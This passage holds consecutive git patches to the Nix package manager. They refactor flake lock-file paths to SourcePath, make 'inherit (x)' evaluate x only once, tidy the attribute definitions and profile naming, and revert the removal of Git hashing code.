                                flake. Also, unless we already have this flake
                                in the top-level lock file, use this flake's
                                own lock file. */
-                            nodePaths.emplace(childNode, inputFlake.storePath);
+                            nodePaths.emplace(childNode, inputFlake.path.parent());
                             computeLocks(
                                 inputFlake.inputs, childNode, inputPath,
                                 oldLock
                                 ? std::dynamic_pointer_cast(oldLock)
-                                : LockFile::read(
-                                    state.store->toRealPath(inputFlake.storePath) + "/" + inputFlake.lockedRef.subdir + "/flake.lock").root.get_ptr(),
+                                : readLockFile(inputFlake.lockFilePath()).root.get_ptr(),
                                 oldLock ? lockRootPath : inputPath,
                                 localPath,
                                 false);
@@ -605,7 +608,7 @@ LockedFlake lockFlake(
 
                             auto childNode = make_ref(lockedRef, ref, false);
 
-                            nodePaths.emplace(childNode, storePath);
+                            nodePaths.emplace(childNode, state.rootPath(state.store->toRealPath(storePath)));
 
                             node->inputs.insert_or_assign(id, childNode);
                         }
@@ -619,9 +622,9 @@ LockedFlake lockFlake(
         };
 
         // Bring in the current ref for relative path resolution if we have it
-        auto parentPath = canonPath(state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir, true);
+        auto parentPath = flake.path.parent().path.abs();
 
-        nodePaths.emplace(newLockFile.root, flake.storePath);
+        nodePaths.emplace(newLockFile.root, flake.path.parent());
 
         computeLocks(
             flake.inputs,
@@ -746,13 +749,15 @@ void callFlake(EvalState & state,
 
     auto overrides = state.buildBindings(lockedFlake.nodePaths.size());
 
-    for (auto & [node, storePath] : lockedFlake.nodePaths) {
+    for (auto & [node, sourcePath] : lockedFlake.nodePaths) {
         auto override = state.buildBindings(2);
 
         auto & vSourceInfo = override.alloc(state.symbols.create("sourceInfo"));
 
        auto lockedNode = node.dynamic_pointer_cast<const LockedNode>();
 
+        auto [storePath, subdir] = state.store->toStorePath(sourcePath.path.abs());
+
         emitTreeAttrs(
             state,
             storePath,
@@ -766,7 +771,7 @@ void callFlake(EvalState & state,
 
         override
             .alloc(state.symbols.create("dir"))
-            .mkString(lockedNode ? lockedNode->lockedRef.subdir : lockedFlake.flake.lockedRef.subdir);
+            .mkString(CanonPath(subdir).rel());
 
         overrides.alloc(state.symbols.create(key->second)).mkAttrs(override);
     }
@@ -928,7 +933,7 @@ Fingerprint LockedFlake::getFingerprint() const
     // flake.sourceInfo.storePath for the fingerprint.
     return hashString(HashAlgorithm::SHA256,
         fmt("%s;%s;%d;%d;%s",
-            flake.storePath.to_string(),
+            flake.path.to_string(),
             flake.lockedRef.subdir,
             flake.lockedRef.input.getRevCount().value_or(0),
             flake.lockedRef.input.getLastModified().value_or(0),
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index 19b680c56..48907813f 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -77,18 +77,27 @@ struct Flake
      * the specific local store result of invoking the fetcher
      */
     FlakeRef lockedRef;
+    /**
+     * The path of `flake.nix`.
+     */
+    SourcePath path;
     /**
      * pretend that 'lockedRef' is dirty
      */
     bool forceDirty = false;
     std::optional<std::string> description;
-    StorePath storePath;
     FlakeInputs inputs;
     /**
      * 'nixConfig' attribute
      */
     ConfigFile config;
+
     ~Flake();
+
+    SourcePath lockFilePath()
+    {
+        return path.parent() / "flake.lock";
+    }
 };
 
 Flake getFlake(EvalState & state, const FlakeRef & flakeRef, bool allowLookup);
@@ -104,11 +113,11 @@ struct LockedFlake
     LockFile lockFile;
 
     /**
-     * Store paths of nodes that have been fetched in
+     * Source tree accessors for nodes that have been fetched in
      * lockFlake(); in particular, the root node and the overriden
      * inputs.
      */
-    std::map<ref<Node>, StorePath> nodePaths;
+    std::map<ref<Node>, SourcePath> nodePaths;
 
     Fingerprint getFingerprint() const;
 };
@@ -165,7 +174,7 @@ struct LockFlags
     /**
      * The path to a lock file to read instead of the `flake.lock` file in the top-level flake
      */
-    std::optional<Path> referenceLockFilePath;
+    std::optional<SourcePath> referenceLockFilePath;
 
     /**
      * The path to a lock file to write to instead of the `flake.lock` file in the top-level flake
diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index e3a28c7c6..d252214dd 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -84,8 +84,10 @@ std::shared_ptr LockFile::findInput(const InputPath & path)
     return doFind(root, path, visited);
 }
 
-LockFile::LockFile(const nlohmann::json & json, const Path & path)
+LockFile::LockFile(std::string_view contents, std::string_view path)
 {
+    auto json = nlohmann::json::parse(contents);
+
     auto version = json.value("version", 0);
     if (version < 5 || version > 7)
         throw Error("lock file '%s' has unsupported version %d", path, version);
@@ -203,12 +205,6 @@ std::pair LockFile::to_string() const
     return {json.dump(2), std::move(nodeKeys)};
 }
 
-LockFile LockFile::read(const Path & path)
-{
-    if (!pathExists(path)) return LockFile();
-    return LockFile(nlohmann::json::parse(readFile(path)), path);
-}
-
 std::ostream & operator <<(std::ostream & stream, const LockFile & lockFile)
 {
     stream << lockFile.toJSON().first.dump(2);
diff --git a/src/libexpr/flake/lockfile.hh b/src/libexpr/flake/lockfile.hh
index 57a7202a2..7e62e6d09 100644
--- a/src/libexpr/flake/lockfile.hh
+++ b/src/libexpr/flake/lockfile.hh
@@ -55,7 +55,7 @@ struct LockFile
     ref<Node> root = make_ref<Node>();
 
     LockFile() {};
-    LockFile(const nlohmann::json & json, const Path & path);
+    LockFile(std::string_view contents, std::string_view path);
 
     typedef std::map<ref<const Node>, std::string> KeyMap;
 
@@ -63,8 +63,6 @@ struct LockFile
 
     std::pair to_string() const;
 
-    static LockFile read(const Path & path);
-
     /**
      * Check whether this lock file has any unlocked inputs. If so,
      * return one.
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 131589f35..e4daa4dba 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -205,6 +205,9 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
         auto lockedFlake = lockFlake();
         auto & flake = lockedFlake.flake;
 
+        // Currently, all flakes are in the Nix store via the rootFS accessor.
+        auto storePath = store->printStorePath(store->toStorePath(flake.path.path.abs()).first);
+
         if (json) {
             nlohmann::json j;
             if (flake.description)
@@ -223,7 +226,7 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
                 j["revCount"] = *revCount;
             if (auto lastModified = flake.lockedRef.input.getLastModified())
                 j["lastModified"] = *lastModified;
-            j["path"] = store->printStorePath(flake.storePath);
+            j["path"] = storePath;
             j["locks"] = lockedFlake.lockFile.toJSON().first;
             logger->cout("%s", j.dump());
         } else {
@@ -239,7 +242,7 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
                     *flake.description);
             logger->cout(
                 ANSI_BOLD "Path:" ANSI_NORMAL "          %s",
-                store->printStorePath(flake.storePath));
+                storePath);
             if (auto rev = flake.lockedRef.input.getRev())
                 logger->cout(
                     ANSI_BOLD "Revision:" ANSI_NORMAL "      %s",
@@ -1031,7 +1034,9 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
 
         StorePathSet sources;
 
-        sources.insert(flake.flake.storePath);
+        auto storePath = store->toStorePath(flake.flake.path.path.abs()).first;
+
+        sources.insert(storePath);
 
         // FIXME: use graph output, handle cycles.
         std::function traverse;
@@ -1060,7 +1065,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
 
         if (json) {
             nlohmann::json jsonRoot = {
-                {"path", store->printStorePath(flake.flake.storePath)},
+                {"path", store->printStorePath(storePath)},
                 {"inputs", traverse(*flake.lockFile.root)},
             };
             logger->cout("%s", jsonRoot);

From cefd0302b55b3360dbca59cfcb4bf6a750d6cdcf Mon Sep 17 00:00:00 2001
From: pennae 
Date: Sat, 27 Jan 2024 16:33:34 +0100
Subject: [PATCH 517/654] evaluate inherit (from) exprs only once per directive

desugaring inherit-from to syntactic duplication of the source expr also
duplicates side effects of the source expr (such as trace calls) and
expensive computations (such as derivationStrict).
---
 doc/manual/rl-next/inherit-from-by-need.md    |  7 +++
 src/libexpr/eval.cc                           | 24 ++++++++--
 src/libexpr/nixexpr.cc                        | 44 ++++++++++++++++---
 src/libexpr/nixexpr.hh                        | 16 +++++++
 src/libexpr/parser-state.hh                   | 11 +++++
 src/libexpr/parser.y                          |  7 ++-
 .../lang/eval-okay-inherit-from.err.exp       |  1 -
 .../lang/eval-okay-inherit-from.exp           |  2 +-
 .../lang/eval-okay-inherit-from.nix           | 12 ++++-
 9 files changed, 109 insertions(+), 15 deletions(-)
 create mode 100644 doc/manual/rl-next/inherit-from-by-need.md

diff --git a/doc/manual/rl-next/inherit-from-by-need.md b/doc/manual/rl-next/inherit-from-by-need.md
new file mode 100644
index 000000000..67c2cdedf
--- /dev/null
+++ b/doc/manual/rl-next/inherit-from-by-need.md
@@ -0,0 +1,7 @@
+---
+synopsis: "`inherit (x) ...` evaluates `x` only once"
+prs: 9847
+---
+
+`inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
+This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 91341e167..a353571af 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -1186,6 +1186,18 @@ void ExprPath::eval(EvalState & state, Env & env, Value & v)
 }
 
 
+Env * ExprAttrs::buildInheritFromEnv(EvalState & state, Env & up)
+{
+    Env & inheritEnv = state.allocEnv(inheritFromExprs->size());
+    inheritEnv.up = &up;
+
+    Displacement displ = 0;
+    for (auto from : *inheritFromExprs)
+        inheritEnv.values[displ++] = from->maybeThunk(state, up);
+
+    return &inheritEnv;
+}
+
 void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
 {
     v.mkAttrs(state.buildBindings(attrs.size() + dynamicAttrs.size()).finish());
@@ -1197,6 +1209,7 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
         Env & env2(state.allocEnv(attrs.size()));
         env2.up = &env;
         dynamicEnv = &env2;
+        Env * inheritEnv = inheritFromExprs ? buildInheritFromEnv(state, env2) : nullptr;
 
         AttrDefs::iterator overrides = attrs.find(state.sOverrides);
         bool hasOverrides = overrides != attrs.end();
@@ -1209,9 +1222,9 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
             Value * vAttr;
             if (hasOverrides && !i.second.inherited()) {
                 vAttr = state.allocValue();
-                mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, &env2), i.second.e);
+                mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, inheritEnv), i.second.e);
             } else
-                vAttr = i.second.e->maybeThunk(state, *i.second.chooseByKind(&env2, &env, &env2));
+                vAttr = i.second.e->maybeThunk(state, *i.second.chooseByKind(&env2, &env, inheritEnv));
             env2.values[displ++] = vAttr;
             v.attrs->push_back(Attr(i.first, vAttr, i.second.pos));
         }
@@ -1244,10 +1257,11 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
     }
 
     else {
+        Env * inheritEnv = inheritFromExprs ? buildInheritFromEnv(state, env) : nullptr;
         for (auto & i : attrs) {
             v.attrs->push_back(Attr(
                     i.first,
-                    i.second.e->maybeThunk(state, *i.second.chooseByKind(&env, &env, &env)),
+                    i.second.e->maybeThunk(state, *i.second.chooseByKind(&env, &env, inheritEnv)),
                     i.second.pos));
         }
     }
@@ -1282,6 +1296,8 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v)
     Env & env2(state.allocEnv(attrs->attrs.size()));
     env2.up = &env;
 
+    Env * inheritEnv = attrs->inheritFromExprs ? attrs->buildInheritFromEnv(state, env2) : nullptr;
+
     /* The recursive attributes are evaluated in the new environment,
        while the inherited attributes are evaluated in the original
        environment. */
@@ -1289,7 +1305,7 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v)
     for (auto & i : attrs->attrs) {
         env2.values[displ++] = i.second.e->maybeThunk(
             state,
-            *i.second.chooseByKind(&env2, &env, &env2));
+            *i.second.chooseByKind(&env2, &env, inheritEnv));
     }
 
     auto dts = state.debugRepl
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 82e69de51..4b805d710 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -80,7 +80,7 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co
         return sa < sb;
     });
     std::vector inherits;
-    std::map<Expr *, std::vector<Symbol>> inheritsFrom;
+    std::map<ExprInheritFrom *, std::vector<Symbol>> inheritsFrom;
     for (auto & i : sorted) {
         switch (i->second.kind) {
         case AttrDef::Kind::Plain:
@@ -90,7 +90,8 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co
             break;
         case AttrDef::Kind::InheritedFrom: {
             auto & select = dynamic_cast(*i->second.e);
-            inheritsFrom[select.e].push_back(i->first);
+            auto & from = dynamic_cast(*select.e);
+            inheritsFrom[&from].push_back(i->first);
             break;
         }
         }
@@ -102,7 +103,7 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co
     }
     for (const auto & [from, syms] : inheritsFrom) {
         str << "inherit (";
-        from->show(symbols, str);
+        (*inheritFromExprs)[from->displ]->show(symbols, str);
         str << ")";
         for (auto sym : syms) str << " " << symbols[sym];
         str << "; ";
@@ -328,6 +329,12 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr &
     this->level = withLevel;
 }
 
+void ExprInheritFrom::bindVars(EvalState & es, const std::shared_ptr & env)
+{
+    if (es.debugRepl)
+        es.exprEnvs.insert(std::make_pair(this, env));
+}
+
 void ExprSelect::bindVars(EvalState & es, const std::shared_ptr & env)
 {
     if (es.debugRepl)
@@ -351,6 +358,27 @@ void ExprOpHasAttr::bindVars(EvalState & es, const std::shared_ptrbindVars(es, env);
 }
 
+std::shared_ptr<const StaticEnv> ExprAttrs::bindInheritSources(
+    EvalState & es, const std::shared_ptr<const StaticEnv> & env)
+{
+    if (!inheritFromExprs)
+        return nullptr;
+
+    // the inherit (from) source values are inserted into an env of its own, which
+    // does not introduce any variable names.
+    // analysis must see an empty env, or an env that contains only entries with
+    // otherwise unused names to not interfere with regular names. the parser
+    // has already filled all exprs that access this env with appropriate level
+    // and displacement, and nothing else is allowed to access it. ideally we'd
+    // not even *have* an expr that grabs anything from this env since it's fully
+    // invisible, but the evaluator does not allow for this yet.
+    auto inner = std::make_shared<StaticEnv>(nullptr, env.get(), 0);
+    for (auto from : *inheritFromExprs)
+        from->bindVars(es, env);
+
+    return inner;
+}
+
 void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr & env)
 {
     if (es.debugRepl)
@@ -368,8 +396,9 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr
 
         // No need to sort newEnv since attrs is in sorted order.
 
+        auto inheritFromEnv = bindInheritSources(es, newEnv);
         for (auto & i : attrs)
-            i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv));
+            i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, inheritFromEnv));
 
         for (auto & i : dynamicAttrs) {
             i.nameExpr->bindVars(es, newEnv);
@@ -377,8 +406,10 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr
         }
     }
     else {
+        auto inheritFromEnv = bindInheritSources(es, env);
+
         for (auto & i : attrs)
-            i.second.e->bindVars(es, i.second.chooseByKind(env, env, env));
+            i.second.e->bindVars(es, i.second.chooseByKind(env, env, inheritFromEnv));
 
         for (auto & i : dynamicAttrs) {
             i.nameExpr->bindVars(es, env);
@@ -446,8 +477,9 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr &
 
     // No need to sort newEnv since attrs->attrs is in sorted order.
 
+    auto inheritFromEnv = attrs->bindInheritSources(es, newEnv);
     for (auto & i : attrs->attrs)
-        i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv));
+        i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, inheritFromEnv));
 
     if (es.debugRepl)
         es.exprEnvs.insert(std::make_pair(this, newEnv));
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 4a93143b4..4bb2ee2f9 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -135,6 +135,18 @@ struct ExprVar : Expr
     COMMON_METHODS
 };
 
+struct ExprInheritFrom : ExprVar
+{
+    ExprInheritFrom(PosIdx pos, Displacement displ): ExprVar(pos, {})
+    {
+        this->level = 0;
+        this->displ = displ;
+        this->fromWith = nullptr;
+    }
+
+    void bindVars(EvalState & es, const std::shared_ptr & env);
+};
+
 struct ExprSelect : Expr
 {
     PosIdx pos;
@@ -195,6 +207,7 @@ struct ExprAttrs : Expr
     };
     typedef std::map AttrDefs;
     AttrDefs attrs;
+    std::unique_ptr<std::vector<Expr *>> inheritFromExprs;
     struct DynamicAttrDef {
         Expr * nameExpr, * valueExpr;
         PosIdx pos;
@@ -208,6 +221,9 @@ struct ExprAttrs : Expr
     PosIdx getPos() const override { return pos; }
     COMMON_METHODS
 
+    std::shared_ptr<const StaticEnv> bindInheritSources(
+        EvalState & es, const std::shared_ptr<const StaticEnv> & env);
+    Env * buildInheritFromEnv(EvalState & state, Env & up);
     void showBindings(const SymbolTable & symbols, std::ostream & str) const;
 };
 
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index ae38de130..9aa18a0ae 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -118,13 +118,24 @@ inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr *
             auto ae = dynamic_cast(e);
             auto jAttrs = dynamic_cast(j->second.e);
             if (jAttrs && ae) {
+                if (ae->inheritFromExprs && !jAttrs->inheritFromExprs)
+                    jAttrs->inheritFromExprs = std::make_unique<std::vector<Expr *>>();
                 for (auto & ad : ae->attrs) {
                     auto j2 = jAttrs->attrs.find(ad.first);
                     if (j2 != jAttrs->attrs.end()) // Attr already defined in iAttrs, error.
                         dupAttr(ad.first, j2->second.pos, ad.second.pos);
                     jAttrs->attrs.emplace(ad.first, ad.second);
+                    if (ad.second.kind == ExprAttrs::AttrDef::Kind::InheritedFrom) {
+                        auto & sel = dynamic_cast(*ad.second.e);
+                        auto & from = dynamic_cast(*sel.e);
+                        from.displ += jAttrs->inheritFromExprs->size();
+                    }
                 }
                 jAttrs->dynamicAttrs.insert(jAttrs->dynamicAttrs.end(), ae->dynamicAttrs.begin(), ae->dynamicAttrs.end());
+                if (ae->inheritFromExprs) {
+                    jAttrs->inheritFromExprs->insert(jAttrs->inheritFromExprs->end(),
+                        ae->inheritFromExprs->begin(), ae->inheritFromExprs->end());
+                }
             } else {
                 dupAttr(attrPath, pos, j->second.pos);
             }
diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y
index 0898b81f7..b0aee7b41 100644
--- a/src/libexpr/parser.y
+++ b/src/libexpr/parser.y
@@ -321,14 +321,17 @@ binds
     }
   | binds INHERIT '(' expr ')' attrs ';'
     { $$ = $1;
-      /* !!! Should ensure sharing of the expression in $4. */
+      if (!$$->inheritFromExprs)
+          $$->inheritFromExprs = std::make_unique<std::vector<Expr *>>();
+      $$->inheritFromExprs->push_back($4);
+      auto from = new nix::ExprInheritFrom(state->at(@4), $$->inheritFromExprs->size() - 1);
       for (auto & i : *$6) {
           if ($$->attrs.find(i.symbol) != $$->attrs.end())
               state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos);
           $$->attrs.emplace(
               i.symbol,
               ExprAttrs::AttrDef(
-                  new ExprSelect(CUR_POS, $4, i.symbol),
+                  new ExprSelect(CUR_POS, from, i.symbol),
                   state->at(@6),
                   ExprAttrs::AttrDef::Kind::InheritedFrom));
       }
diff --git a/tests/functional/lang/eval-okay-inherit-from.err.exp b/tests/functional/lang/eval-okay-inherit-from.err.exp
index 51881205b..3227501f2 100644
--- a/tests/functional/lang/eval-okay-inherit-from.err.exp
+++ b/tests/functional/lang/eval-okay-inherit-from.err.exp
@@ -1,2 +1 @@
 trace: used
-trace: used
diff --git a/tests/functional/lang/eval-okay-inherit-from.exp b/tests/functional/lang/eval-okay-inherit-from.exp
index 43bd0e899..024daff6b 100644
--- a/tests/functional/lang/eval-okay-inherit-from.exp
+++ b/tests/functional/lang/eval-okay-inherit-from.exp
@@ -1 +1 @@
-[ 1 2 { __overrides = { y = { d = [ ]; }; }; c = [ ]; d = 4; x = { c = [ ]; }; y = «repeated»; } ]
+[ 1 2 { __overrides = { y = { d = [ ]; }; }; c = [ ]; d = 4; x = { c = [ ]; }; y = «repeated»; } { inner = { c = 3; d = 4; }; } ]
diff --git a/tests/functional/lang/eval-okay-inherit-from.nix b/tests/functional/lang/eval-okay-inherit-from.nix
index d1fad7d69..b72a1c639 100644
--- a/tests/functional/lang/eval-okay-inherit-from.nix
+++ b/tests/functional/lang/eval-okay-inherit-from.nix
@@ -2,5 +2,15 @@ let
   inherit (builtins.trace "used" { a = 1; b = 2; }) a b;
   x.c = 3;
   y.d = 4;
+
+  merged = {
+    inner = {
+      inherit (y) d;
+    };
+
+    inner = {
+      inherit (x) c;
+    };
+  };
 in
-  [ a b rec { x.c = []; inherit (x) c; inherit (y) d; __overrides.y.d = []; } ]
+  [ a b rec { x.c = []; inherit (x) c; inherit (y) d; __overrides.y.d = []; } merged ]

From 1cd87b7042d14aae1fafa47b1c28db4c5bd20de7 Mon Sep 17 00:00:00 2001
From: pennae 
Date: Mon, 26 Feb 2024 15:33:52 +0100
Subject: [PATCH 518/654] remove ExprAttrs::AttrDef::inherited

it's no longer widely used and has a rather confusing meaning now that
inherit-from is handled very differently.
---
 src/libexpr/eval.cc         | 2 +-
 src/libexpr/nixexpr.hh      | 2 --
 src/libexpr/parser-state.hh | 2 +-
 3 files changed, 2 insertions(+), 4 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index a353571af..2e7c8207c 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -1220,7 +1220,7 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
         Displacement displ = 0;
         for (auto & i : attrs) {
             Value * vAttr;
-            if (hasOverrides && !i.second.inherited()) {
+            if (hasOverrides && i.second.kind != AttrDef::Kind::Inherited) {
                 vAttr = state.allocValue();
                 mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, inheritEnv), i.second.e);
             } else
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 4bb2ee2f9..2390c4286 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -189,8 +189,6 @@ struct ExprAttrs : Expr
             : kind(kind), e(e), pos(pos) { };
         AttrDef() { };
 
-        bool inherited() const { return kind == Kind::Inherited; }
-
         template<typename T>
         const T & chooseByKind(const T & plain, const T & inherited, const T & inheritedFrom) const
         {
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index 9aa18a0ae..34aef661f 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
@@ -89,7 +89,7 @@ inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr *
         if (i->symbol) {
             ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol);
             if (j != attrs->attrs.end()) {
-                if (!j->second.inherited()) {
+                if (j->second.kind != ExprAttrs::AttrDef::Kind::Inherited) {
                     ExprAttrs * attrs2 = dynamic_cast(j->second.e);
                     if (!attrs2) dupAttr(attrPath, pos, j->second.pos);
                     attrs = attrs2;

From f24e445bc024cfd3c26be5f061280af549321c22 Mon Sep 17 00:00:00 2001
From: pennae <82953136+pennae@users.noreply.github.com>
Date: Mon, 26 Feb 2024 15:43:51 +0100
Subject: [PATCH 519/654] add doc comment justifying ExprInheritFrom

Co-authored-by: Robert Hensing 
---
 src/libexpr/nixexpr.hh | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 2390c4286..94356759b 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -135,6 +135,11 @@ struct ExprVar : Expr
     COMMON_METHODS
 };
 
+/**
+ * A pseudo-expression for the purpose of evaluating the `from` expression in `inherit (from)` syntax.
+ * Unlike normal variable references, the displacement is set during parsing, and always refers to
+ * `ExprAttrs::inheritFromExprs` (by itself or in `ExprLet`), whose values are put into their own `Env`.
+ */
 struct ExprInheritFrom : ExprVar
 {
     ExprInheritFrom(PosIdx pos, Displacement displ): ExprVar(pos, {})

From d28a240aa66acaa7691c8d56054cc9fd4c7fd8f3 Mon Sep 17 00:00:00 2001
From: Bob van der Linden 
Date: Mon, 26 Feb 2024 21:06:07 +0100
Subject: [PATCH 520/654] profile: extract getNameFromElement

---
 src/nix/profile.cc | 17 +++++++++++------
 1 file changed, 11 insertions(+), 6 deletions(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index fc669d5ed..e04ae008d 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -101,6 +101,15 @@ struct ProfileElement
     }
 };
 
+std::string getNameFromElement(const ProfileElement & element)
+{
+    std::optional<std::string> result = std::nullopt;
+    if (element.source) {
+        result = getNameFromURL(parseURL(element.source->to_string()));
+    }
+    return result.value_or(element.identifier());
+}
+
 struct ProfileManifest
 {
     using ProfileElementName = std::string;
@@ -189,12 +198,8 @@ struct ProfileManifest
 
     void addElement(ProfileElement element)
     {
-        auto name =
-            element.source
-            ? getNameFromURL(parseURL(element.source->to_string()))
-            : std::nullopt;
-        auto name2 = name ? *name : element.identifier();
-        addElement(name2, std::move(element));
+        auto name = getNameFromElement(element);
+        addElement(name, std::move(element));
     }
 
     nlohmann::json toJSON(Store & store) const

From be0052b45fb1da5018c640157fc0cef95185c5bb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 <7226587+thufschmitt@users.noreply.github.com>
Date: Tue, 27 Feb 2024 06:39:30 +0100
Subject: [PATCH 521/654] Revert "Remove dead Git code"

---
 src/libutil/fs-sink.cc    |  46 ++++++
 src/libutil/fs-sink.hh    |   7 +
 src/libutil/git.cc        | 289 ++++++++++++++++++++++++++++++++++++++
 src/libutil/git.hh        | 152 ++++++++++++++++++++
 tests/unit/libutil/git.cc | 205 +++++++++++++++++++++++++++
 5 files changed, 699 insertions(+)

diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc
index 0ebd750f6..35ce0ac36 100644
--- a/src/libutil/fs-sink.cc
+++ b/src/libutil/fs-sink.cc
@@ -5,6 +5,52 @@
 
 namespace nix {
 
+void copyRecursive(
+    SourceAccessor & accessor, const CanonPath & from,
+    FileSystemObjectSink & sink, const Path & to)
+{
+    auto stat = accessor.lstat(from);
+
+    switch (stat.type) {
+    case SourceAccessor::tSymlink:
+    {
+        sink.createSymlink(to, accessor.readLink(from));
+        break;
+    }
+
+    case SourceAccessor::tRegular:
+    {
+        sink.createRegularFile(to, [&](CreateRegularFileSink & crf) {
+            if (stat.isExecutable)
+                crf.isExecutable();
+            accessor.readFile(from, crf, [&](uint64_t size) {
+                crf.preallocateContents(size);
+            });
+        });
+        break;
+    }
+
+    case SourceAccessor::tDirectory:
+    {
+        sink.createDirectory(to);
+        /* Copy every entry; no early exit from the loop. */
+        for (auto & [name, _] : accessor.readDirectory(from)) {
+            copyRecursive(
+                accessor, from / name,
+                sink, to + "/" + name);
+        }
+        break;
+    }
+
+    case SourceAccessor::tMisc:
+        throw Error("file '%1%' has an unsupported type", from);
+
+    default:
+        abort();
+    }
+}
+
+
 struct RestoreSinkSettings : Config
 {
     Setting<bool> preallocateContents{this, false, "preallocate-contents",
diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh
index 670b55c2b..ae577819a 100644
--- a/src/libutil/fs-sink.hh
+++ b/src/libutil/fs-sink.hh
@@ -41,6 +41,13 @@ struct FileSystemObjectSink
     virtual void createSymlink(const Path & path, const std::string & target) = 0;
 };
 
+/**
+ * Recursively copy file system objects from the source into the sink.
+ */
+void copyRecursive(
+    SourceAccessor & accessor, const CanonPath & sourcePath,
+    FileSystemObjectSink & sink, const Path & destPath);
+
 /**
  * Ignore everything and do nothing
  */
diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 029e1af44..5733531fa 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -5,13 +5,302 @@
 #include 
 #include  // for strcasecmp
 
+#include "signals.hh"
+#include "config.hh"
+#include "hash.hh"
+#include "posix-source-accessor.hh"
+
 #include "git.hh"
+#include "serialise.hh"
 
 namespace nix::git {
 
 using namespace nix;
 using namespace std::string_literals;
 
+std::optional decodeMode(RawMode m) {
+    switch (m) {
+        case (RawMode) Mode::Directory:
+        case (RawMode) Mode::Executable:
+        case (RawMode) Mode::Regular:
+        case (RawMode) Mode::Symlink:
+            return (Mode) m;
+        default:
+            return std::nullopt;
+    }
+}
+
+
+static std::string getStringUntil(Source & source, char byte)
+{
+    std::string s;
+    char n[1];
+    source(std::string_view { n, 1 });
+    while (*n != byte) {
+        s += *n;
+        source(std::string_view { n, 1 });
+    }
+    return s;
+}
+
+
+static std::string getString(Source & source, int n)
+{
+    std::string v;
+    v.resize(n);
+    source(v);
+    return v;
+}
+
+void parseBlob(
+    FileSystemObjectSink & sink,
+    const Path & sinkPath,
+    Source & source,
+    bool executable,
+    const ExperimentalFeatureSettings & xpSettings)
+{
+    xpSettings.require(Xp::GitHashing);
+
+    sink.createRegularFile(sinkPath, [&](auto & crf) {
+        if (executable)
+            crf.isExecutable();
+
